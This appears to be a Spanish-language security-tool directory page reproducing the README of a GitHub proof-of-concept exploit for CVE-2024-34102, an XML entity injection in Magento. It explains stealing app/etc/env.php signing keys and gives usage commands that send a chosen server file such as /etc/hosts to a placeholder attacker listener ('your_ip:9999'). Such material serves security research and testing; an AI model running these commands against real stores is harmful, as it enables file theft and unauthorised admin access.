Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-34102 — Prueba de concepto del exploit para CVE-2024-34102, una inyección crítica de entidades XML en Magento que permite la exfiltración de archivos sensibles y el acceso no autorizado al administrador. Solo para uso educativo. | Kitploit
Herramientas/GitHubGitHub/mksundaram69/cve-2024-34102
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebExfiltración de DatosAprendizaje y Educación
GitHubmksundaram69/cve-2024-34102

CVE-2024-34102

Prueba de concepto del exploit para CVE-2024-34102, una inyección crítica de entidades XML en Magento que permite la exfiltración de archivos sensibles y el acceso no autorizado al administrador. Solo para uso educativo.

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🇮🇱 #BringThemHome #NeverAgainIsNow 🇮🇱

Exigimos el regreso seguro de todos los ciudadanos que han sido tomados como rehenes por el grupo terrorista Hamás. No descansaremos hasta que cada rehén sea liberado y regrese a casa sano y salvo. Puedes ayudar a traerlos de vuelta a casa. https://stories.bringthemhomenow.net/

PoC CVE-2024-34102 🚀

Este repositorio contiene un exploit de prueba de concepto (PoC) para la vulnerabilidad crítica de inyección de entidades XML (CVE-2024-34102) en Magento. Esta vulnerabilidad permite la exfiltración de archivos sensibles, que luego pueden aprovecharse para obtener acceso no autorizado a las funcionalidades administrativas de Magento. Este exploit está diseñado con fines educativos y debe utilizarse de manera responsable.

Descripción general 📖

Magento es una de las soluciones de comercio electrónico más populares utilizadas a nivel mundial. En junio de 2024, se descubrió un problema crítico de inyección de entidades XML sin autenticación previa, identificado como CVE-2024-34102. Esta vulnerabilidad puede tener consecuencias graves, incluida la exfiltración del archivo app/etc/env.php de Magento, que contiene claves criptográficas utilizadas para firmar JWTs.

Características 🌟

  • Exfiltra archivos sensibles de una instancia de Magento vulnerable.
  • Uso simple y directo.
  • Demostración educativa de la inyección de entidades XML.

Uso 🚀

Requisitos previos

  • Python 3.x
  • Biblioteca requests (pip install requests)

Ejecución del exploit

  1. Clona el repositorio:

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
    cd CVE-2024-34102-exploit
    
  2. Ejecuta el script con los argumentos necesarios:

    root@kitploit:~
    python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
    

Argumentos de línea de comandos

  • --target-url: La URL de la instancia de Magento objetivo.
  • --target-file: La ruta del archivo en el servidor objetivo a exfiltrar.
  • --exfil-url: La URL para recibir los datos exfiltrados.

Ejemplo 🌐

root@kitploit:~
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
Descargar herramienta